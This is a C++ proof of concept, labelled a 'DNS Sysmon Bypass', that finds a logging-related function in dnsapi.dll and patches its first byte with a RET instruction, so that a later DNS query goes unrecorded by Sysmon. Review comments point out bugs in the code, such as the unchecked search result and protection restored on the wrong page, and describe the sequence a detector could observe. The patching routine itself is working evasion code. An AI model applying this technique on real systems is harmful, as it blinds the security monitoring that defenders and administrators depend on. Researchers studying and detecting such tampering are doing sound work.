| #include <iostream> | |
| #include <Windows.h> | |
| #include <WinDNS.h> | |
| // Pattern for hunting dnsapi!McTemplateU0zqxqz | |
| #define PATTERN (unsigned char*)"\x48\x89\x5c\x24\x08\x44\x89\x4c\x24\x20\x55\x48\x8d\x6c" | |
| #define PATTERN_LEN 14 | |
| // Search for pattern in memory | |
// Linear byte-pattern scan over `mem`.
//
// Walks the first 0x200000 bytes starting at `mem`, using the first two
// signature bytes as a cheap pre-filter before a full memcmp of
// `signatureLen` bytes. Returns the offset of the first match.
//
// Review notes (grounded in the code as written):
//  - The scan length is a hard-coded 0x200000 and is never tied to the
//    actual size of the region behind `mem`; if the mapped object is
//    smaller, the reads at `mem + i` / `mem + i + 1` and the memcmp run
//    past its end (out-of-bounds read).
//  - `offset` starts at 0 and is only set on a hit, so "not found" and
//    "found at offset 0" are indistinguishable to the caller; there is no
//    separate failure signal.
//  - `signature` is read at index 0 and 1 before the length is consulted,
//    so a `signatureLen` below 2 still touches two bytes.
DWORD SearchPattern(unsigned char* mem, unsigned char* signature, DWORD signatureLen) {
    ULONG offset = 0;   // 0 doubles as the "no match" result
    for (int i = 0; i < 0x200000; i++) {
        // Two-byte pre-check to avoid a memcmp at every position.
        if (*(unsigned char*)(mem + i) == signature[0] && *(unsigned char*)(mem + i + 1) == signature[1]) {
            if (memcmp(mem + i, signature, signatureLen) == 0) {
                // Found the signature
                offset = i;
                break;
            }
        }
    }
    return offset;
}
// Entry point.
//
// Sequence as written: load dnsapi.dll, locate the byte pattern from
// PATTERN inside the mapped module, flip the containing page to
// PAGE_EXECUTE_READWRITE, overwrite the first matched byte with 0xC3,
// attempt to restore protection, then issue one DNS query.
//
// Review notes (grounded in the code as written):
//  - The result of SearchPattern is used unchecked. Because that helper
//    returns 0 for "not found", a miss leads to a write at `dll + 0`,
//    i.e. into the module's own header, not into the intended function.
//  - Neither VirtualProtect return value is checked; a failed protection
//    change is followed by the write regardless.
//  - The second VirtualProtect passes `dll` (module base), not
//    `dll + patternOffset`, so the page that was actually modified keeps
//    PAGE_EXECUTE_READWRITE rather than being restored. An RWX page inside
//    a mapped system module is a memory-scanner-visible artifact.
//  - `%d` is paired with a DWORD (unsigned) argument in the offset printf;
//    `%lu` would match the type.
//  - The DnsQuery_A result and the no-return-value from main are left as
//    is; C++ permits main to fall off the end (implicit return 0).
// From a detection standpoint, the observable sequence here is a
// protection change to PAGE_EXECUTE_READWRITE on a region inside a loaded
// system DLL followed by a write into that region, then a DNS query.
int main()
{
    DWORD oldProtect, oldOldProtect;
    printf("DNS Sysmon Bypass POC\n by @_xpn_\n\n");
    // HMODULE is the module base address; cast to a byte pointer for scanning.
    unsigned char *dll = (unsigned char *)LoadLibraryA("dnsapi.dll");
    if (dll == (void*)0) {
        printf("[x] Could not load dnsapi.dll\n");
        return 1;
    }
    // 0 here means "no match" as well as "match at base"; not distinguished.
    DWORD patternOffset = SearchPattern(dll, PATTERN, PATTERN_LEN);
    printf("[*] Pattern found at offset %d\n", patternOffset);
    printf("[*] Patching with RET\n");
    // Return value not checked.
    VirtualProtect(dll + patternOffset, 10, PAGE_EXECUTE_READWRITE, &oldProtect);
    *(dll + patternOffset) = 0xc3;
    // Restores protection on the module base, not on the page written above.
    VirtualProtect(dll, 10, oldProtect, &oldOldProtect);
    printf("[*] Sending DNS Query... should now not be detected\n");
    DnsQuery_A("blog.xpnsec.com", DNS_TYPE_A, DNS_QUERY_STANDARD, NULL, NULL, NULL);
}